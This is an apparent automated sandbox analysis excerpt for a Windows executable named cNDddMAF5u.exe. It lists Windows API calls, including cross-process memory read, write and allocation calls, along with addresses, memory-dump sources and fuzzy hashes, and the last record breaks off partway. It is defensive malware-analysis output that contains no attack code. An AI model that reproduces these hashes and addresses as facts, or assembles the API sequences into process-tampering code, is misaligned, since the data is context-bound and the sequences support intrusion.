                                                        APIs
                                                        • GetLastError.KERNEL32(?,?,?,006CF2DE,006D3863,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6), ref: 006D2DFD
                                                        • _free.LIBCMT ref: 006D2E32
                                                        • _free.LIBCMT ref: 006D2E59
                                                        • SetLastError.KERNEL32(00000000,006A1129), ref: 006D2E66
                                                        • SetLastError.KERNEL32(00000000,006A1129), ref: 006D2E6F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$_free
                                                        • String ID:
                                                        • API String ID: 3170660625-0
                                                        • Opcode ID: 2b61dc8f60ce90a64477daa5c575fe53385610716e51c337878fca03f2bf795c
                                                        • Instruction ID: 909f4e634583a9a8e0918f9cebbca9f3dbbb8fa0c3984a0a95ee0996063b78d9
                                                        • Opcode Fuzzy Hash: 2b61dc8f60ce90a64477daa5c575fe53385610716e51c337878fca03f2bf795c
                                                        • Instruction Fuzzy Hash: 3F014932E046026BC61323356CA6D6B275BABF23B2720842FF421A3392EE78CC010165
                                                        APIs
                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?,?,0070035E), ref: 0070002B
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700046
                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700054
                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?), ref: 00700064
                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,006FFF41,80070057,?,?), ref: 00700070
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                        • String ID:
                                                        • API String ID: 3897988419-0
                                                        • Opcode ID: e586688b982cc5b4c03d397a77e37688e58d16fe8e598b88f13ad167e6adb84f
                                                        • Instruction ID: b03e19bfc15da9bf7fb53ed1696616d69ed52d751011f21a1154d94c80cf6603
                                                        • Opcode Fuzzy Hash: e586688b982cc5b4c03d397a77e37688e58d16fe8e598b88f13ad167e6adb84f
                                                        • Instruction Fuzzy Hash: F5016276600214FFEB118F69DC48BAA7AEDEF44762F148224F905E6250DB79DE409BA0
                                                        APIs
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0070E997
                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 0070E9A5
                                                        • Sleep.KERNEL32(00000000), ref: 0070E9AD
                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 0070E9B7
                                                        • Sleep.KERNEL32 ref: 0070E9F3
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                        • String ID:
                                                        • API String ID: 2833360925-0
                                                        • Opcode ID: 1c866707b28e5d78e19bab7748b92478cbbbaa50876aef08a02bb79d9f5d2bbb
                                                        • Instruction ID: 22d8a1b6e0f8b59b947d74176f5d5dfe5c23966812c1b01403f5ffd1f94a1992
                                                        • Opcode Fuzzy Hash: 1c866707b28e5d78e19bab7748b92478cbbbaa50876aef08a02bb79d9f5d2bbb
                                                        • Instruction Fuzzy Hash: 65019271C1162DDBDF009FE5DC596DDBBB8FF08302F004A46E502B2191DB38A550D7A6
                                                        APIs
                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00701114
                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701120
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 0070112F
                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00700B9B,?,?,?), ref: 00701136
                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0070114D
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 842720411-0
                                                        • Opcode ID: adbc4afb0a3c26a321676fea66d31fd298bfc62be6ad708ac589f3c430181e3b
                                                        • Instruction ID: eecebe33a0fa503603399d8bc556fa353fecf2d183cc62bb50cefd3f8708e0a8
                                                        • Opcode Fuzzy Hash: adbc4afb0a3c26a321676fea66d31fd298bfc62be6ad708ac589f3c430181e3b
                                                        • Instruction Fuzzy Hash: 95018175100209FFEB164F68DC49E6A3FAEEF85361B104414FA41D3350DB35DC009B60
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00700FCA
                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00700FD6
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00700FE5
                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00700FEC
                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00701002
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: 108156d75025e8ae24428cb0246d8b13cbf64cfdd290de519dbbd0e629bae011
                                                        • Instruction ID: 644e6f7c5f62c1686e942a629eaf652fe2ac3b36f548b5d79626ff5dbe5b2ea7
                                                        • Opcode Fuzzy Hash: 108156d75025e8ae24428cb0246d8b13cbf64cfdd290de519dbbd0e629bae011
                                                        • Instruction Fuzzy Hash: 0BF06D75200305EBEB224FA4DC4EF563BADEF89762F508414FA85E7291CA79DC508B60
                                                        APIs
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0070102A
                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00701036
                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701045
                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0070104C
                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00701062
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                        • String ID:
                                                        • API String ID: 44706859-0
                                                        • Opcode ID: f8c35013a3765e34fab2ae37f9f03e92aa527f935161fc96d58571e05e4c004a
                                                        • Instruction ID: 7128f9a7466fda5ca06938ae6da154ac53c9828eb8b5caba5b88b7df041ce3fe
                                                        • Opcode Fuzzy Hash: f8c35013a3765e34fab2ae37f9f03e92aa527f935161fc96d58571e05e4c004a
                                                        • Instruction Fuzzy Hash: F0F06D75300305EBEB225FA4EC49F563BADEF89762F504414FA85E7290CA79DC508B60
                                                        APIs
                                                        • CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710324
                                                        • CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710331
                                                        • CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 0071033E
                                                        • CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 0071034B
                                                        • CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710358
                                                        • CloseHandle.KERNEL32(?,?,?,?,0071017D,?,007132FC,?,00000001,006E2592,?), ref: 00710365
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 8736158a8a4f3617b53a2584d12bc8eb98337e29f324d569473944926ce1c5e0
                                                        • Instruction ID: 310a2a9894c9798cb31910b1b0255038d3e55aa540bfb0810e3a76cdbf634e86
                                                        • Opcode Fuzzy Hash: 8736158a8a4f3617b53a2584d12bc8eb98337e29f324d569473944926ce1c5e0
                                                        • Instruction Fuzzy Hash: D901AE72800B159FCB30AF6AD880852FBF9BF603153158A3FD1A652971C3B5A999DF80
                                                        APIs
                                                        • _free.LIBCMT ref: 006DD752
                                                          • Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
                                                          • Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0
                                                        • _free.LIBCMT ref: 006DD764
                                                        • _free.LIBCMT ref: 006DD776
                                                        • _free.LIBCMT ref: 006DD788
                                                        • _free.LIBCMT ref: 006DD79A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: ff96af869f18e3dd4f82b9c70df998a4d1b80513e304a724c65e58de7f4bef65
                                                        • Instruction ID: a5ea2a6cd58a442d9232db41eb0056801a655f89681be5cb1cf2cefe745acfbb
                                                        • Opcode Fuzzy Hash: ff96af869f18e3dd4f82b9c70df998a4d1b80513e304a724c65e58de7f4bef65
                                                        • Instruction Fuzzy Hash: 92F06232D40305AB8662FB65F9D1C6A77DFBB54710B99484BF099DB701C734FC808A68
                                                        APIs
                                                        • _free.LIBCMT ref: 006D22BE
                                                          • Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
                                                          • Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0
                                                        • _free.LIBCMT ref: 006D22D0
                                                        • _free.LIBCMT ref: 006D22E3
                                                        • _free.LIBCMT ref: 006D22F4
                                                        • _free.LIBCMT ref: 006D2305
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: c607da22cf200d97bb8f36867f762785852637c2b25c1a5020c333fec41120ea
                                                        • Instruction ID: 5f0ce4150ffd0f53572a3cf7d4dbd5c1e938c9bc49884daa4707c3bf4c7a02f0
                                                        • Opcode Fuzzy Hash: c607da22cf200d97bb8f36867f762785852637c2b25c1a5020c333fec41120ea
                                                        • Instruction Fuzzy Hash: E3F05470D002128B8663BF69BC218583B66F728B90740850BF419D7372CB7C0591BFEC
                                                        APIs
                                                        • EndPath.GDI32(?), ref: 006B95D4
                                                        • StrokeAndFillPath.GDI32(?,?,006F71F7,00000000,?,?,?), ref: 006B95F0
                                                        • SelectObject.GDI32(?,00000000), ref: 006B9603
                                                        • DeleteObject.GDI32 ref: 006B9616
                                                        • StrokePath.GDI32(?), ref: 006B9631
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                        • String ID:
                                                        • API String ID: 2625713937-0
                                                        • Opcode ID: e08f4d1529d81e02d7a66c827c06db80825e4e41a30f9383474ef1f6ed975e4b
                                                        • Instruction ID: ce51949de5f6c586960b33109bc773b02f918099bd1aef26c0db31c67c917c94
                                                        • Opcode Fuzzy Hash: e08f4d1529d81e02d7a66c827c06db80825e4e41a30f9383474ef1f6ed975e4b
                                                        • Instruction Fuzzy Hash: 7FF03171005288DBE7265F59ED1C7A43F61A700366F44C214F659651F0D73895D2DF28
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: __freea$_free
                                                        • String ID: a/p$am/pm
                                                        • API String ID: 3432400110-3206640213
                                                        • Opcode ID: 803f110ad71ee28dd634f0b8203996b59bcb45075b2517c51da3c345c8489a36
                                                        • Instruction ID: c8d8688af5626ee66aff780e38152c2b78fe662c22a4f9a8314d52846b9df4c3
                                                        • Opcode Fuzzy Hash: 803f110ad71ee28dd634f0b8203996b59bcb45075b2517c51da3c345c8489a36
                                                        • Instruction Fuzzy Hash: F3D1CD71D00206EADB289F68C855BFAB7B3EF07300F29415BE901AF751D6B59E81CB91
                                                        APIs
                                                          • Part of subcall function 006C0242: EnterCriticalSection.KERNEL32(0077070C,00771884,?,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C024D
                                                          • Part of subcall function 006C0242: LeaveCriticalSection.KERNEL32(0077070C,?,006B198B,00772518,?,?,?,006A12F9,00000000), ref: 006C028A
                                                          • Part of subcall function 006C00A3: __onexit.LIBCMT ref: 006C00A9
                                                        • __Init_thread_footer.LIBCMT ref: 00726238
                                                          • Part of subcall function 006C01F8: EnterCriticalSection.KERNEL32(0077070C,?,?,006B8747,00772514), ref: 006C0202
                                                          • Part of subcall function 006C01F8: LeaveCriticalSection.KERNEL32(0077070C,?,006B8747,00772514), ref: 006C0235
                                                          • Part of subcall function 0071359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 007135E4
                                                          • Part of subcall function 0071359C: LoadStringW.USER32(00772390,?,00000FFF,?), ref: 0071360A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                        • String ID: x#w$x#w$x#w
                                                        • API String ID: 1072379062-1925529421
                                                        • Opcode ID: f2517a4ae0f52bc3aabab008b957a8c4ced8ec634ad3361c30532ea945188ad4
                                                        • Instruction ID: 8a339fa1d614bac7939eaeb06e289606699f9bd2775fbcc4252cd9639bcb12f8
                                                        • Opcode Fuzzy Hash: f2517a4ae0f52bc3aabab008b957a8c4ced8ec634ad3361c30532ea945188ad4
                                                        • Instruction Fuzzy Hash: 2BC19E71A00115AFCB14EF58D890EBEB7BAFF49310F10806AF9559B291DB74EE51CB90
                                                        APIs
                                                        • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,00000002,00000000,?,?,?,00000000,?,?,?,?), ref: 006D8B6E
                                                        • GetLastError.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,00000000,00001000,?), ref: 006D8B7A
                                                        • __dosmaperr.LIBCMT ref: 006D8B81
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr
                                                        • String ID: .l
                                                        • API String ID: 2434981716-3986846653
                                                        • Opcode ID: 7c7e5fb048af6a11ad2491eab51904019cc891034b097bbacc532f142412fc42
                                                        • Instruction ID: 7a74dd540b929326fcec394e0aa84d58c31daa39685244a762b0ac2bdb799845
                                                        • Opcode Fuzzy Hash: 7c7e5fb048af6a11ad2491eab51904019cc891034b097bbacc532f142412fc42
                                                        • Instruction Fuzzy Hash: 28415CB0E04185AFD7259F68C898ABD7FA7DB85304B2C819BF88587342DE358C029794
                                                        APIs
                                                          • Part of subcall function 0070B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007021D0,?,?,00000034,00000800,?,00000034), ref: 0070B42D
                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00702760
                                                          • Part of subcall function 0070B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,007021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 0070B3F8
                                                          • Part of subcall function 0070B32A: GetWindowThreadProcessId.USER32(?,?), ref: 0070B355
                                                          • Part of subcall function 0070B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00702194,00000034,?,?,00001004,00000000,00000000), ref: 0070B365
                                                          • Part of subcall function 0070B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00702194,00000034,?,?,00001004,00000000,00000000), ref: 0070B37B
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 007027CD
                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0070281A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                        • String ID: @
                                                        • API String ID: 4150878124-2766056989
                                                        • Opcode ID: d341b315f3a70ddf64c3c30a66a4d88be15c14bfd0aacc435ce4a7939217116e
                                                        • Instruction ID: 56e8c8a0aa023c20685a75325e92aef8b96279437651cd5518cad5095e7b518e
                                                        • Opcode Fuzzy Hash: d341b315f3a70ddf64c3c30a66a4d88be15c14bfd0aacc435ce4a7939217116e
                                                        • Instruction Fuzzy Hash: 67412976900218EFDB10DFA4C946AEEBBB8EB09300F108199FA55B7181DA746F45CBA0
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\cNDddMAF5u.exe,00000104), ref: 006D1769
                                                        • _free.LIBCMT ref: 006D1834
                                                        • _free.LIBCMT ref: 006D183E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free$FileModuleName
                                                        • String ID: C:\Users\user\Desktop\cNDddMAF5u.exe
                                                        • API String ID: 2506810119-1753390976
                                                        • Opcode ID: b9c5c4302d198ca1afb89806505c7799ee6253190c24b31b951795b6783fd032
                                                        • Instruction ID: c3d232846637b2cf7c9fc2f92524bac1fa9342784e0e7dfc06d317facb0cd397
